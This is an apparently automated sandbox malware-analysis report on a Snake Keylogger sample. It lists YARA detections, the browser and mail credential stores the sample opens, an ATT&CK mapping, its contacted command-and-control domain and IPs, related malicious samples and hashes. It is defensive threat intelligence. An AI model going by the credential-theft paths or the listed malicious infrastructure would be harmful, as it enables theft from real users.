            Source: Yara matchFile source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2078403632.00000000142F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4498824475.0000000003DAF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4498824475.0000000003C89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2078403632.000000001418F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2080607376.000000001CBD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4498824475.0000000003A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rp8s2rxD5lpuQAG.exe PID: 3688, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rp8s2rxD5lpuQAG.exe PID: 4304, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.rp8s2rxD5lpuQAG.exe.140000000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2078403632.00000000142F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2078403632.000000001418F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2080607376.000000001CBD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rp8s2rxD5lpuQAG.exe PID: 3688, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rp8s2rxD5lpuQAG.exe PID: 4304, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.rp8s2rxD5lpuQAG.exe.140000000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2078403632.00000000142F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4498824475.0000000003DAF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4498824475.0000000003C89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2078403632.000000001418F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2080607376.000000001CBD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4498824475.0000000003A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rp8s2rxD5lpuQAG.exe PID: 3688, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rp8s2rxD5lpuQAG.exe PID: 4304, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		211
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		1
            Query Registry            		Remote Services1
            Email Collection            		11
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Disable or Modify Tools            		LSASS Memory1
            Security Software Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		1
            Non-Standard Port            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
            Virtualization/Sandbox Evasion            		Security Account Manager1
            Process Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		1
            Ingress Tool Transfer            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook211
            Process Injection            		NTDS31
            Virtualization/Sandbox Evasion            		Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
            Obfuscated Files or Information            		LSA Secrets1
            Application Window Discovery            		SSHKeylogging23
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
            Software Packing            		Cached Domain Credentials1
            System Network Configuration Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Timestomp            		DCSync13
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            rp8s2rxD5lpuQAG.exe55%ReversingLabsWin64.Spyware.Snakekeylogger
            rp8s2rxD5lpuQAG.exe100%AviraTR/AD.SnakeStealer.qhsrm

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://reallyfreegeoip.org0%URL Reputationsafe
            http://checkip.dyndns.org0%URL Reputationsafe
            http://checkip.dyndns.org/0%URL Reputationsafe
            http://checkip.dyndns.com0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://checkip.dyndns.org/q0%URL Reputationsafe
            http://reallyfreegeoip.org0%URL Reputationsafe
            https://reallyfreegeoip.org/xml/0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            azvconsulting.com
            		185.14.58.143
            		truetrue
              		unknown
              reallyfreegeoip.org
              		188.114.97.3
              		truetrue
                		unknown
                checkip.dyndns.com
                		193.122.130.0
                		truefalse
                  		unknown
                  checkip.dyndns.org
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://checkip.dyndns.org/false
                    • URL Reputation: safe
                    		unknown
                    https://reallyfreegeoip.org/xml/173.254.250.90false
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://reallyfreegeoip.orgrp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003B4E000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C2D000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C62000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003B9C000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C06000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C75000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://checkip.dyndns.orgrp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://azvconsulting.comrp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003DAF000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown
                        http://checkip.dyndns.comrp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003B4E000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C2D000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C62000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C06000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C75000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namerp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003A41000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://reallyfreegeoip.org/xml/173.254.250.90prp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003B4E000.00000004.00000800.00020000.00000000.sdmpfalse
                          		unknown
                          http://checkip.dyndns.org/qrp8s2rxD5lpuQAG.exe, 00000000.00000002.2078403632.000000001418F000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000000.00000002.2078403632.00000000142F7000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000000.00000002.2080607376.000000001CBD0000.00000004.00000020.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://reallyfreegeoip.orgrp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://reallyfreegeoip.org/xml/rp8s2rxD5lpuQAG.exe, 00000000.00000002.2078403632.000000001418F000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000000.00000002.2078403632.00000000142F7000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000000.00000002.2080607376.000000001CBD0000.00000004.00000020.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003B4E000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          188.114.97.3
                          		reallyfreegeoip.orgEuropean Union
                          		13335CLOUDFLARENETUStrue
                          193.122.130.0
                          		checkip.dyndns.comUnited States
                          		31898ORACLE-BMC-31898USfalse
                          185.14.58.143
                          		azvconsulting.comSpain
                          		202054S4N-ASEStrue

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1540254
                          Start date and time:2024-10-23 16:00:40 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 7m 7s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:7
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:rp8s2rxD5lpuQAG.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@3/1@4/3
                          EGA Information:Failed
                          HCA Information:
                          • Successful, ratio: 67%
                          • Number of executed functions: 109
                          • Number of non-executed functions: 1
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target rp8s2rxD5lpuQAG.exe, PID 3688 because it is empty
                          • Execution Graph export aborted for target rp8s2rxD5lpuQAG.exe, PID 4304 because it is empty
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • VT rate limit hit for: rp8s2rxD5lpuQAG.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          10:01:31API Interceptor14348735x Sleep call for process: rp8s2rxD5lpuQAG.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          188.114.97.3http://onlinecheapflights.net/Get hashmaliciousUnknownBrowse
                          • onlinecheapflights.net/
                          Technical Datasheet and Specification_PDF.exeGet hashmaliciousUnknownBrowse
                          • www.rihanaroly.sbs/othk/?0dk=RykyQ3QZ+r1dqZwhAQupYMuQy26h2PYi8Fyfl3RAfHSVFgYOfXbCDUNV+aNHe22U393WzLygMMdANTa+vksg1hx1LENxGTGsZa2bATkiGgfiS6KvHA==&urk=NXuT
                          request-BPp -RFQ 0975432.exeGet hashmaliciousPureLog StealerBrowse
                          • www.ergeneescortg.xyz/guou/
                          Halkbank_Ekstre_20230426_075819_154055.exeGet hashmaliciousFormBookBrowse
                          • www.thetahostthe.top/9r5x/
                          http://comodozeropoint.com/updates/1736162964/N1/Team.exeGet hashmaliciousUnknownBrowse
                          • comodozeropoint.com/updates/1736162964/N1/Team.exe
                          SecuriteInfo.com.Win32.MalwareX-gen.14607.6011.exeGet hashmaliciousUnknownBrowse
                          • servicetelemetryserver.shop/api/index.php
                          SecuriteInfo.com.Trojan.DownLoader47.45523.5497.16574.exeGet hashmaliciousUnknownBrowse
                          • servicetelemetryserver.shop/api/index.php
                          SecuriteInfo.com.Trojan.DownLoader47.45523.5497.16574.exeGet hashmaliciousUnknownBrowse
                          • servicetelemetryserver.shop/api/index.php
                          ZP4KZDHVHWZZ2DC13DMX.exeGet hashmaliciousAmadeyBrowse
                          • tipinfodownload-soft1.com/g9jvjfd73/index.php
                          aQdB62N7SB.elfGet hashmaliciousShikitega, XmrigBrowse
                          • main.dsn.ovh/dns/loadbit
                          193.122.130.0InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                          • checkip.dyndns.org/
                          Pedido urgente_pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                          • checkip.dyndns.org/
                          CLOSURE.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • checkip.dyndns.org/
                          greatthingswithgreatideasgivenmerestthignstgood.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                          • checkip.dyndns.org/
                          NEW ORDER QUOTATION REQUEST.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • checkip.dyndns.org/
                          z40sun.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                          • checkip.dyndns.org/
                          z55PleasefindattachedtheRFQinquiry.exeGet hashmaliciousSnake KeyloggerBrowse
                          • checkip.dyndns.org/
                          Rundholterne89.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          • checkip.dyndns.org/
                          Swift Detail 103.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                          • checkip.dyndns.org/
                          001_215_EA2047939_202410210815.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          • checkip.dyndns.org/

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          reallyfreegeoip.orgInvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                          • 188.114.96.3
                          eFo07GvEf0.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 188.114.96.3
                          Pedido urgente_pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                          • 188.114.96.3
                          Ziraat Bankasi Swift Mesaji,pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 188.114.96.3
                          AmountXpayable.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 188.114.96.3
                          FINAL SHIPPING DOCS.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                          • 188.114.97.3
                          CLOSURE.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 188.114.97.3
                          REVISED INVOICE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 188.114.97.3
                          Inquiry N_ TM23-10-00.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 188.114.97.3
                          41570002689_20220814_05352297_HesapOzeti.exeGet hashmaliciousMassLogger RATBrowse
                          • 188.114.97.3
                          checkip.dyndns.comInvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                          • 193.122.6.168
                          eFo07GvEf0.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 132.226.247.73
                          Pedido urgente_pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                          • 193.122.130.0
                          Ziraat Bankasi Swift Mesaji,pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 193.122.6.168
                          AmountXpayable.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 193.122.6.168
                          FINAL SHIPPING DOCS.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                          • 132.226.8.169
                          CLOSURE.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 158.101.44.242
                          REVISED INVOICE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 193.122.6.168
                          Inquiry N_ TM23-10-00.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 193.122.6.168
                          41570002689_20220814_05352297_HesapOzeti.exeGet hashmaliciousMassLogger RATBrowse
                          • 132.226.8.169

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 172.67.206.204
                          Scan_8346203.pdfGet hashmaliciousUnknownBrowse
                          • 104.18.95.41
                          https://re.e-sharedonedrivefile.com/skjashdGet hashmaliciousUnknownBrowse
                          • 172.67.149.171
                          https://t.ly/ZPR23.10Get hashmaliciousUnknownBrowse
                          • 188.114.97.3
                          https://us-west-2.protection.sophos.com/?d=site.pro&u=aHR0cHM6Ly9jbGF1ZGlha3J1ZWdlci5zaXRlLnByby8=&i=NThlN2NjYzYyOTljZjkxNGY4YmM1Njkz&t=QTRyTlRXbysvd3IyNERLT1pJYVNuNlAvU0FLMVAyb2pCN053UGFJSWtBST0=&h=dd65eaa7298b4ffebbd13b01dcbd3434&s=AVNPUEhUT0NFTkNSWVBUSVYfWTd0VrJEAZ1PFPx8UNdDDkWk4HVuGeVZrBnJzV7IfgGet hashmaliciousUnknownBrowse
                          • 172.64.151.101
                          winzg.exeGet hashmaliciousUnknownBrowse
                          • 172.67.162.203
                          winzg.exeGet hashmaliciousUnknownBrowse
                          • 104.21.90.238
                          https://t.ly/cI3TmGet hashmaliciousUnknownBrowse
                          • 104.20.6.133
                          Totalenergies.com_reff_3243808335_ATGeyDyASJ.htmlGet hashmaliciousPhisherBrowse
                          • 104.17.25.14
                          https://app.oneflow.com/api/agreements/8821185/assets/b81e65c04f5acdc6369b89fe6d9aba378483abd6.pdf?at=490c38a4784c740c75de3531f3291888226b3acdGet hashmaliciousUnknownBrowse
                          • 188.114.96.3
                          S4N-ASESqbXaqu1O6O.elfGet hashmaliciousMiraiBrowse
                          • 185.14.58.174
                          XFem90EWlz.elfGet hashmaliciousMiraiBrowse
                          • 185.14.58.161
                          UBB4sPTSCi.elfGet hashmaliciousMiraiBrowse
                          • 185.14.58.188
                          9WDxWYPBQq.elfGet hashmaliciousMiraiBrowse
                          • 185.14.58.193
                          notabotnet.mipsGet hashmaliciousMiraiBrowse
                          • 185.14.58.161
                          xd.armGet hashmaliciousMiraiBrowse
                          • 185.14.58.188
                          JyvDqLVH73Get hashmaliciousMiraiBrowse
                          • 185.14.58.190
                          https://kocoonsaludyaventura.com/wpGet hashmaliciousUnknownBrowse
                          • 185.14.57.27
                          x86Get hashmaliciousMiraiBrowse
                          • 185.14.58.169
                          r4cks.armGet hashmaliciousMiraiBrowse
                          • 185.14.58.175
                          ORACLE-BMC-31898USInvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                          • 158.101.44.242
                          Pedido urgente_pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                          • 193.122.130.0
                          Ziraat Bankasi Swift Mesaji,pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 193.122.6.168
                          AmountXpayable.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 193.122.6.168
                          CLOSURE.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 158.101.44.242
                          REVISED INVOICE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 193.122.6.168
                          Inquiry N_ TM23-10-00.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 193.122.6.168
                          greatthingswithgreatideasgivenmerestthignstgood.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                          • 193.122.130.0
                          la.bot.arm.elfGet hashmaliciousUnknownBrowse
                          • 144.25.234.65
                          la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                          • 130.61.64.122

                          JA3 Fingerprints

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          54328bd36c14bd82ddaa0c04b25ed9adeFo07GvEf0.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 188.114.97.3
                          Pedido urgente_pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                          • 188.114.97.3
                          Ziraat Bankasi Swift Mesaji,pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 188.114.97.3
                          AmountXpayable.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 188.114.97.3
                          FINAL SHIPPING DOCS.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                          • 188.114.97.3
                          REVISED INVOICE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 188.114.97.3
                          Inquiry N_ TM23-10-00.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 188.114.97.3
                          41570002689_20220814_05352297_HesapOzeti.exeGet hashmaliciousMassLogger RATBrowse
                          • 188.114.97.3
                          PAYMENT ADVISE MT107647545.exeGet hashmaliciousSnake KeyloggerBrowse
                          • 188.114.97.3
                          greatthingswithgreatideasgivenmerestthignstgood.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                          • 188.114.97.3

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\rp8s2rxD5lpuQAG.exe.log

                          Download File
                          Process:C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe
                          File Type:CSV text
                          Category:dropped
                          Size (bytes):1510
                          Entropy (8bit):5.380493107040482
                          Encrypted:false
                          SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNl+84xp3/VclT:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAA
                          MD5:3C7E5782E6C100B90932CBDED08ADE42
                          SHA1:D498EE0833BB8C85592FB3B1E482267362DB3F74
                          SHA-256:361A6FF160343A2400F7D3FA4A009EA20C994B9788C190EB9D53E544BB376490
                          SHA-512:3A90D61631F4DC920860AEA31FDB5E56A102206311705D5D084E809D364F680B4E95F19CE9849D3F9CB3C2C273393FD2F2C67720BAAA885125EE358D59462B0A
                          Malicious:true
                          Reputation:moderate, very likely benign file
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                          Static File Info

                          General

                          File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                          Entropy (8bit):7.656954215082718
                          TrID:
                          • Win64 Executable GUI Net Framework (217006/5) 49.88%
                          • Win64 Executable GUI (202006/5) 46.43%
                          • Win64 Executable (generic) (12005/4) 2.76%
                          • Generic Win/DOS Executable (2004/3) 0.46%
                          • DOS Executable Generic (2002/1) 0.46%
                          File name:rp8s2rxD5lpuQAG.exe
                          File size:655'872 bytes
                          MD5:43299ecabd7a0636e5755414d6b7dc0c
                          SHA1:488e54f43753706c1ea4e9ba9adffcac501ca086
                          SHA256:21a47b89b543c1b97adba1999aba18a149cf9e96e00bdabe70f929ba1a8b424e
